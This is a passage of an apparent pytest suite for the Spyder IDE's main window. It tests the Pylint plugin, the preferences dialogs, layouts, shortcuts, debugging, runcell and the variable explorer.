# Test that the symbol finder opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_symbolfinder_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert editorstack.switcher_dlg.count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Times out sometimes on macOS")
def test_run_static_code_analysis(main_window, qtbot):
"""This tests that the Pylint plugin is working as expected."""
from spyder.plugins.pylint.main_widget import PylintWidgetActions
# Select the third-party plugin
pylint_plugin = main_window.get_plugin(Plugins.Pylint)
# Do an analysis
test_file = osp.join(LOCATION, 'script_pylint.py')
main_window.editor.load(test_file)
pylint_plugin.get_action(PylintWidgetActions.RunCodeAnalysis).trigger()
qtbot.wait(3000)
# Perform the test
# Check output of the analysis
treewidget = pylint_plugin.get_widget().get_focus_widget()
qtbot.waitUntil(lambda: treewidget.results is not None,
timeout=SHELL_TIMEOUT)
result_content = treewidget.results
assert result_content['C:']
pylint_version = parse_version(pylint.__version__)
if pylint_version < parse_version('2.5.0'):
number_of_conventions = 5
else:
number_of_conventions = 3
assert len(result_content['C:']) == number_of_conventions
# Close the file
main_window.editor.close_file()
@flaky(max_runs=3)
@pytest.mark.slow
def test_troubleshooting_menu_item_and_url(main_window, qtbot, monkeypatch):
"""Test that the troubleshooting menu item calls the valid URL."""
application_plugin = main_window.application
MockQDesktopServices = Mock()
mockQDesktopServices_instance = MockQDesktopServices()
attr_to_patch = ('spyder.utils.qthelpers.QDesktopServices')
monkeypatch.setattr(attr_to_patch, MockQDesktopServices)
# Unit test of help menu item: Make sure the correct URL is called.
application_plugin.trouble_action.trigger()
assert MockQDesktopServices.openUrl.call_count == 1
mockQDesktopServices_instance.openUrl.called_once_with(__trouble_url__)
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows")
def test_help_opens_when_show_tutorial_full(main_window, qtbot):
"""
Test fix for spyder-ide/spyder#6317.
'Show tutorial' opens the help plugin if closed.
"""
HELP_STR = "Help"
help_pane_menuitem = None
for action in main_window.layouts.plugins_menu.get_actions():
if action.text() == HELP_STR:
help_pane_menuitem = action
break
# Test opening tutorial with Help plugin closed
main_window.help.toggle_view_action.setChecked(False)
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert help_tabbar is None and help_index is None
assert not isinstance(main_window.focusWidget(), ObjectComboBox)
assert not help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open, but not selected
help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1)
% help_tabbar.count())
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index != help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open and the active tab
qtbot.wait(500)
main_window.help.show_tutorial()
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
qtbot.wait(500)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_issue(main_window, qtbot):
"""Test that the report error dialog opens correctly."""
main_window.console.report_issue()
qtbot.wait(300)
assert main_window.console.get_widget()._report_dlg is not None
assert main_window.console.get_widget()._report_dlg.isVisible()
assert main_window.console.get_widget()._report_dlg.close()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
sys.platform.startswith('linux'), reason="It segfaults on Linux")
def test_custom_layouts(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
mw = main_window
mw.first_spyder_run = False
prefix = 'window' + '/'
settings = mw.layouts.load_window_settings(prefix=prefix, default=True)
# Test layout changes
for layout_idx in get_class_values(DefaultLayouts):
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
layout = mw.layouts.setup_default_layouts(
layout_idx, settings=settings)
qtbot.wait(500)
for area in layout._areas:
if area['visible']:
for plugin_id in area['plugin_ids']:
if plugin_id not in area['hidden_plugin_ids']:
plugin = mw.get_plugin(plugin_id)
print(plugin) # spyder: test-skip
try:
# New API
assert plugin.get_widget().isVisible()
except AttributeError:
# Old API
assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not running_in_ci() or sys.platform.startswith('linux'),
reason="Only runs in CIs and fails on Linux sometimes")
def test_programmatic_custom_layouts(main_window, qtbot):
"""
Test that a custom layout gets registered and it is recognized."""
mw = main_window
mw.first_spyder_run = False
# Test layout registration
layout_id = 'testing layout'
# Test the testing plugin is being loaded
mw.get_plugin('spyder_boilerplate')
# Get the registered layout
layout = mw.layouts.get_layout(layout_id)
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
mw.layouts.quick_layout_switch(layout_id)
qtbot.wait(500)
for area in layout._areas:
if area['visible']:
for plugin_id in area['plugin_ids']:
if plugin_id not in area['hidden_plugin_ids']:
plugin = mw.get_plugin(plugin_id)
print(plugin) # spyder: test-skip
try:
# New API
assert plugin.get_widget().isVisible()
except AttributeError:
# Old API
assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
def test_save_on_runfile(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
# Load test file
test_file = osp.join(LOCATION, 'script.py')
test_file_copy = test_file[:-3] + '_copy.py'
shutil.copyfile(test_file, test_file_copy)
main_window.editor.load(test_file_copy)
code_editor = main_window.editor.get_focus_widget()
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
qtbot.keyClicks(code_editor, 'test_var = 123', delay=100)
filename = code_editor.filename
with qtbot.waitSignal(shell.sig_prompt_ready):
shell.execute('runfile("{}")'.format(remove_backslashes(filename)))
assert shell.get_value('test_var') == 123
main_window.editor.close_file()
os.remove(test_file_copy)
@pytest.mark.slow
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_pylint_follows_file(qtbot, tmpdir, main_window):
"""Test that file editor focus change updates pylint combobox filename."""
pylint_plugin = main_window.get_plugin(Plugins.Pylint)
# Show pylint plugin
pylint_plugin.dockwidget.show()
pylint_plugin.dockwidget.raise_()
# Create base temporary directory
basedir = tmpdir.mkdir('foo')
# Open some files
for idx in range(2):
fh = basedir.join('{}.py'.format(idx))
fname = str(fh)
fh.write('print("Hello world!")')
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Create a editor split
main_window.editor.editorsplitter.split(orientation=Qt.Vertical)
qtbot.wait(500)
# Open other files
for idx in range(4):
fh = basedir.join('{}.py'.format(idx))
fh.write('print("Hello world!")')
fname = str(fh)
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Close split panel
for editorstack in reversed(main_window.editor.editorstacks):
editorstack.close_split()
break
qtbot.wait(1000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_comms_error(qtbot, main_window):
"""Test if a comms error is correctly displayed."""
CONF.set('main', 'show_internal_errors', True)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a bogus get_cwd
with qtbot.waitSignal(shell.executed):
shell.execute('def get_cwd(): import foo')
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm."
"register_call_handler('get_cwd', get_cwd)")
with qtbot.waitSignal(shell.executed, timeout=3000):
shell.execute('ls')
qtbot.waitUntil(lambda: main_window.console.error_dialog is not None,
timeout=EVAL_TIMEOUT)
error_dialog = main_window.console.error_dialog
assert 'Exception in comms call get_cwd' in error_dialog.error_traceback
assert 'No module named' in error_dialog.error_traceback
main_window.console.close_error_dialog()
CONF.set('main', 'show_internal_errors', False)
@pytest.mark.slow
@flaky(max_runs=3)
def test_break_while_running(main_window, qtbot, tmpdir):
"""Test that we can set breakpoints while running."""
# Create loop
code = ("import time\n"
"for i in range(100):\n"
" print(i)\n"
" time.sleep(0.1)\n"
)
p = tmpdir.join("loop_script.py")
p.write(code)
test_file = to_text_string(p)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Load test file
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Continue debugging
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
# Set a breakpoint
code_editor.debugger.toogle_breakpoint(line_number=3)
# We should drop into the debugger
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, '!q')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# --- Preferences
# ----------------------------------------------------------------------------
def preferences_dialog_helper(qtbot, main_window, section):
"""
Open preferences dialog and select page with `section` (CONF_SECTION).
"""
main_window.show_preferences()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg = container.dialog
index = dlg.get_index_by_name(section)
page = dlg.get_page(index)
dlg.set_current_index(index)
return dlg, index, page
@pytest.mark.slow
def test_preferences_run_section_exists(main_window, qtbot):
"""
Test for spyder-ide/spyder#13524 regression.
Ensure the Run section exists.
"""
assert preferences_dialog_helper(qtbot, main_window, 'run')
@pytest.mark.slow
def test_preferences_checkboxes_not_checked_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10139 regression.
Enabling codestyle/docstyle on the completion section of preferences,
was not updating correctly.
"""
# Reset config
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pydocstyle'),
False)
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pycodestyle'),
False)
# Open completion prefences and update options
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'completions')
# Get the correct tab pages inside the Completion preferences page
tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())]
tabs = [(page.tabs.widget(i).layout().itemAt(0).widget(), i)
for i in range(page.tabs.count())]
tabs = dict(zip(tnames, tabs))
tab_widgets = {
'code style and formatting': 'code_style_check',
'docstring style': 'docstring_style_check'
}
for tabname in tab_widgets:
tab, idx = tabs[tabname]
check_name = tab_widgets[tabname]
check = getattr(tab, check_name)
page.tabs.setCurrentIndex(idx)
check.animateClick()
qtbot.wait(500)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
# Check the menus are correctly updated
count = 0
for menu_item in main_window.source_menu_actions:
if menu_item and isinstance(menu_item, QAction):
print(menu_item.text(), menu_item.isChecked())
if 'code style' in menu_item.text():
assert menu_item.isChecked()
count += 1
elif 'docstring style' in menu_item.text():
assert menu_item.isChecked()
count += 1
assert count == 2
# Reset config
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pydocstyle'),
False)
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pycodestyle'),
False)
@pytest.mark.slow
def test_preferences_change_font_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10284 regression.
Changing font resulted in error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'appearance')
for fontbox in [page.plain_text_font.fontbox,
page.rich_text_font.fontbox]:
fontbox.setFocus()
idx = fontbox.currentIndex()
fontbox.setCurrentIndex(idx + 1)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@pytest.mark.skipif(
not sys.platform.startswith('linux'),
reason="Changes of Shitf+Return shortcut cause an ambiguous shortcut")
def test_preferences_empty_shortcut_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#12992 regression.
Overwriting shortcuts results in a shortcuts conflict.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Setup shortcuts (set run cell and advance shortcut to run selection)
base_run_cell_advance = CONF.get_shortcut(
'editor', 'run cell and advance') # Should be Shift+Return
base_run_selection = CONF.get_shortcut(
'editor', 'run selection') # Should be F9
assert base_run_cell_advance == 'Shift+Return'
assert base_run_selection == 'F9'
CONF.set_shortcut(
'editor', 'run cell and advance', '')
CONF.set_shortcut(
'editor', 'run selection', base_run_cell_advance)
main_window.shortcuts.apply_shortcuts()
# Check execution of shortcut
# Create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(u'print(0)\nprint(ññ)')
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: u'print(0)' in shell._control.toPlainText())
assert u'ññ' not in shell._control.toPlainText()
# Reset shortcuts
CONF.set_shortcut(
'editor', 'run selection', 'F9')
CONF.set_shortcut(
'editor', 'run cell and advance', 'Shift+Return')
main_window.shortcuts.apply_shortcuts()
qtbot.wait(500) # Wait for shortcut change to actually be applied
# Check shortcut run cell and advance reset
code_editor.setFocus()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: 'runcell(0' in shell._control.toPlainText())
@pytest.mark.slow
def test_preferences_shortcut_reset_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#11132 regression.
Resetting shortcut resulted in error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'shortcuts')
page.reset_to_default(force=True)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@pytest.mark.order(1)
def test_preferences_change_interpreter(qtbot, main_window):
"""Test that on main interpreter change signal is emitted."""
# Check original pyls configuration
lsp = main_window.completions.get_provider('lsp')
config = lsp.generate_python_config()
jedi = config['configurations']['pylsp']['plugins']['jedi']
assert jedi['environment'] is None
assert jedi['extra_paths'] == []
# Change main interpreter on preferences
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
page.cus_exec_radio.setChecked(True)
page.cus_exec_combo.combobox.setCurrentText(sys.executable)
with qtbot.waitSignal(main_window.sig_main_interpreter_changed,
timeout=5000, raising=True):
dlg.ok_btn.animateClick()
# Check updated pyls configuration
config = lsp.generate_python_config()
jedi = config['configurations']['pylsp']['plugins']['jedi']
assert jedi['environment'] == sys.executable
assert jedi['extra_paths'] == []
@pytest.mark.slow
def test_preferences_last_page_is_loaded(qtbot, main_window):
# Test that the last page is updated on re open
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
main_window.show_preferences()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg = container.dialog
assert dlg.get_current_index() == index
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_go_to_definition(main_window, qtbot, capsys):
"""Test that go-to-definition works as expected."""
# --- Code that gives no definition
code_no_def = dedent("""
from qtpy.QtCore import Qt
Qt.FramelessWindowHint""")
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_no_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to
# FramelessWindowHint
code_editor.move_cursor(-1)
with qtbot.waitSignal(
code_editor.completions_response_signal):
code_editor.go_to_definition_from_cursor()
# Capture stderr and assert there are no errors
sys_stream = capsys.readouterr()
assert sys_stream.err == u''
# --- Code that gives definition
code_def = "import qtpy.QtCore"
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to QtCore
code_editor.move_cursor(-1)
with qtbot.waitSignal(
code_editor.completions_response_signal):
code_editor.go_to_definition_from_cursor()
def _get_filenames():
return [osp.basename(f) for f in main_window.editor.get_filenames()]
qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames())
assert 'QtCore.py' in _get_filenames()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin' and not PY2,
reason="It times out on macOS/PY3")
def test_debug_unsaved_file(main_window, qtbot):
"""Test that we can debug an unsaved file."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text('print(0)\nprint(1)\nprint(2)')
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Start debugging
qtbot.mouseClick(debug_button, Qt.LeftButton)
# There is a breakpoint, so it should continue
qtbot.waitUntil(
lambda: '!continue' in shell._control.toPlainText())
qtbot.waitUntil(
lambda: "1---> 2 print(1)" in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [True, False])
def test_runcell(main_window, qtbot, tmpdir, debug):
"""Test the runcell command."""
# Write code with a cell to a file
code = u"result = 10; fname = __file__"
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
if debug:
function = 'debugcell'
else:
function = 'runcell'
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute(function + u"(0, r'{}')".format(to_text_string(p)))
if debug:
# Reach the 'name' input
shell.pdb_execute('!c')
qtbot.wait(1000)
# Verify that the `result` variable is defined
assert shell.get_value('result') == 10
# Verify that the `fname` variable is `cell-test.py`
assert "cell-test.py" in shell.get_value('fname')
# Verify that the `__file__` variable is undefined
try:
shell.get_value('__file__')
assert False
except KeyError:
pass
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_leading_indent(main_window, qtbot, tmpdir):
"""Test the runcell command with leading indent."""
# Write code with a cell to a file
code = ("def a():\n return\nif __name__ == '__main__':\n"
"# %%\n print(1233 + 1)\n")
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(1, r'{}')".format(to_text_string(p)))
assert "1234" in shell._control.toPlainText()
assert "This is not valid Python code" not in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_rename(main_window, qtbot, tmpdir):
"""
Test renaming a variable.
Regression test for spyder-ide/spyder#10735
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Rename one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.rename_item(new_name='arr2')
# Wait until all objects have updated in the variable explorer
def data(cm, i, j):
return cm.data(cm.index(i, j))
qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2',
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr2'
assert data(nsb.editor.model, 2, 0) == 'li'
assert data(nsb.editor.model, 3, 0) == 's'
# ---- Run file again ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5,
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr'
assert data(nsb.editor.model, 2, 0) == 'arr2'
assert data(nsb.editor.model, 3, 0) == 'li'
assert data(nsb.editor.model, 4, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_remove(main_window, qtbot, tmpdir):
"""
Test removing a variable.
Regression test for spyder-ide/spyder#10709
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Remove one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.remove_item(force=True)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3,
timeout=EVAL_TIMEOUT)
def data(cm, i, j):
assert cm.rowCount() == 3
return cm.data(cm.index(i, j))
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'li'
assert data(nsb.editor.model, 2, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_refresh(main_window, qtbot):
"""
Test refreshing the variable explorer while the kernel is executing.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
control = main_window.ipyconsole.get_widget().get_focus_widget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
shell.execute("import time\n"
"for i in range(10):\n"
" print('i = {}'.format(i))\n"
" time.sleep(.1)\n")
qtbot.waitUntil(lambda: "i = 0" in control.toPlainText())
qtbot.wait(300)
# Get value object
nsb = main_window.variableexplorer.current_widget()
# This is empty
assert len(nsb.editor.source_model._data) == 0
nsb.refresh_table()
qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1)
assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_runcell_edge_cases(main_window, qtbot, tmpdir):
"""
Test if runcell works with an unnamed cell at the top of the file
and with an empty cell.
"""
# Write code with a cell to a file
code = ('if True:\n'
' a = 1\n'
'#%%')
p = tmpdir.join("test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
code_editor = main_window.editor.get_focus_widget()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(1000)
assert 'runcell(0' in shell._control.toPlainText()
assert 'cell is empty' not in shell._control.toPlainText()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(1' in shell._control.toPlainText()
assert 'Error' not in shell._control.toPlainText()
assert 'cell is empty' in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_pdb(main_window, qtbot):
"""Test the runcell command in pdb."""
# Write code with a cell to a file
code = ("if 'abba' in dir():\n"
" print('abba {}'.format(abba))\n"
"else:\n"
" def foo():\n"
" abba = 27\n"
" foo()\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Start debugging
with qtbot.waitSignal(shell.executed, timeout=10000):
qtbot.mouseClick(debug_button, Qt.LeftButton)
for key in ['!n', '!n', '!s', '!n', '!n']:
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, key)
qtbot.keyClick(shell._control, Qt.Key_Enter)
assert shell.get_value('abba') == 27
code_editor.setFocus()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert "runcell" in shell._control.toPlainText()
# Make sure the local variables are detected
assert "abba 27" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [False, True])
def test_runcell_cache(main_window, qtbot, debug):
"""Test the runcell command cache."""
# Write code with a cell to a file
code = ("import time\n"
"time.sleep(.5)\n"
"# %%\n"
"print('Done')\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
if debug:
# Start debugging
with qtbot.waitSignal(shell.executed):
shell.execute("%debug print()")
# Run the two cells
code_editor.setFocus()
code_editor.move_cursor(0)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(100)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.waitUntil(lambda: "Done" in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Works reliably on Linux")
def test_path_manager_updates_clients(qtbot, main_window, tmpdir):
"""Check that on path manager updates, consoles correctly update."""
main_window.show_path_manager()
dlg = main_window._path_manager
test_folder = 'foo-spam-bar-123'
folder = str(tmpdir.mkdir(test_folder))
dlg.add_path(folder)
qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT)
with qtbot.waitSignal(dlg.sig_path_changed, timeout=EVAL_TIMEOUT):
dlg.button_ok.animateClick()
cmd = 'import sys;print(sys.path)'
# Check Spyder is updated
main_window.console.execute_lines(cmd)
syspath = main_window.console.get_sys_path()
assert folder in syspath
# Check clients are updated
count = 0
for client in main_window.ipyconsole.get_clients():
shell = client.shellwidget
if shell is not None:
syspath = shell.execute(cmd)
control = shell._control
# `shell.executed` signal was not working so we use waitUntil
qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(),
timeout=10000)
assert test_folder in control.toPlainText()
count += 1
assert count >= 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It times out on macOS and Windows")
def test_pdb_key_leak(main_window, qtbot, tmpdir):
"""
Check that pdb notify spyder doesn't call
QApplication.processEvents(). If it does there might be keystoke leakage.
see #10834
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
